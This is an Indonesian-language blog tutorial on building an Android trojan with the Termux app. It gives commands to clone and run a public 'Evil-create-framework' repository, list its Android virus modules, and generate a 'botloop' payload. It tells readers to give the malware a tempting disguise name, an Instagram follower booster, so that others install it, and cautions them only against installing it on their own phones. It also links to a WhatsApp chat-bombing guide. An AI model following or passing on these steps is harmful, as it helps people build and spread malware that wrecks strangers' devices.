Lompat ke konten Lompat ke sidebar Lompat ke footer
Cara Membuat Virus di Termux Terbaru 2020

Cara Membuat Virus di Termux Terbaru 2020

Halo sobat Bombaytrik, pada kesempatan yang sangat berbahagia ini saya akan sharing tutorial mengenai bagaimana Cara membuat virus di Termux. Tutorial akan saya jelaskan di artikel berikut ini, jadi simak baik-baik berikut turorialnya.

Cara Membuat Virus di Termux Terbaru 2020

Bagi agan-agan pecinta aplikasi termux pasti sudah tahu kelebihan-kelebihan yang dimiliki oleh aplikasi terbaik ini. Aplikasi Termux ini adalah sebuah aplikasi yang mirip dengan linux di komputer yaitu berbasis open source, kegunaannya yaitu antara lain untuk menganalisi jaringan, memeriksa kelemahan website dan masih banyak lagi yang dapat kita oprek dalam aplikasi ini.

Tentunya untuk bisa menjalankan aplikasi sesuai keinginan kita yaitu membutuhkan sebuah script. Script yang kita maksudkan disini mempunyai perintah yang sudah disetel agar dapat kita operasikan.

Sama halnya dengan membuat sebuah virus di hp android, kita disini membutuhkan sebuah script pembuat virus android. Setelah itu akan kita jalankan script tersebut pada aplikasi termux. Penasaran gimana cara buat virus di termux? simak berikut tutorialnya.

Baca juga: Cara Bom Chat WhatsApp Termux

Cara Membuat Virus di Termux Terbaru 2020

Ada beberapa jenis virus yang sering bermunculan di android, diantaranya yaitu virus worm (cacing), virus ini dapat menyebar melalui bluetooth dan masuk kedalam ponsel melalui pesan. Virus ini dapat mengaktifkan bluetooth sekitar 15 sampai 30 menit. Tapi apabila kena virus ini aman-aman saja karena tidak ngeri seperti virus dibawah ini.

Kedua, virus Trojan, yaitu berbentuk sebuah program seperti aplikasi yang dapat merusak hp kalian dalam hitungan detik setelah kalian menjalankan aplikasi tersebut. Jadi hati-hati bagi kalian yang mendownload aplikasi melalui google.

Oke setelah membahas virus-virus apa saja yang dapat merusak ponsel, selanjutnya kita ke tutorialnya. Tutorial disini kita pakai yang ngeri saja, yaitu membuat virus di aplikasi termux versi trojan. Simak berikut tutorialnya.

Bahan-bahan yang dibutuhkan
1. Aplikasi Termux
2. Data Internet
3. Script Evil Create Framework, yang akan kita cloning.

Langkah pertama, Upgrade termuxnya dulu dengan cara:
$ pkg install update && pkg install upgrade

Kedua, Install Python
$ pkg install python

Ketiga, Install GIT 
$ pkg install git

Keempat, Cloning scriptnya:

$ git clone https://github.com/LOolzeC/Evil-create-framework

Kelima, lihat scriptnya:

$ ls

Keenam, kita buka directory dari Evil Create Framework, dengan cara:

$ cd Evil-create-framework

Ketujuh, Lalu kita lihat directory dari Evil Create Framework

$ ls

Kedelapan, Setelah itu, kita jalankan script untuk pembuatan virusnya, dengan cara:

$ sh install.sh

Enter lalu pilih termux nomer (2) dan enter lagi. Tunggu beberapa detik sampai penginstalan list virusnya selesai. dan akan muncul seperti gambar dibawah ini.


Kesembilan, Ketikkan perintah dibawah ini untuk melihat list virus apa saja yang dapat kita buat.

$ show android 

Pilih salah satu virus yang akan kalian buat, contohnya pilih virus botloop salin semua tulisan seperti ini /modules/android/module_botloop.

Sepuluh, Kita akan coba buat virusnya.

$ create virus/modules/android/module_botloop

Sebelas, kita simpan virusnya di memory internal hp, dengan cara:

$ SET OUTPUT /sdcard

Duabelas, Kita kasih nama virusnya, usahakan agak menarik perhatian, seperti:
$ SET VIRUS NAME PenambahFollowersIG

Terakhir, kita pindahkan virusnya ke dalam internal hp / sd card, dengan cara

$ create

Silahkan tunggu beberapa detik agar selsesai pembuatan aplikasi virusnya dan otomatis tersimpan dalam memori internal hp kalian.

Selesai

Notes: 
Jangan sekali-kali kalian Install aplikasi virusnya di hape kalian, agar tidak sampai terjadi kata "Senjata makan tua" ya,hehe. Jadi kalian sembunyikan aplikasi virusnya di folder khusus.


Hadeh, panjang juga tutorial cara membuat virus di apk termux, lumayan teman-teman. Semoga tutorial ini bermanfaat. Sekali lagi saya ingatkan agar kalian tidak menginstall aplikasi virus nya di hape sendiri, akan bisa berakibat buruk, oke!

Open Comments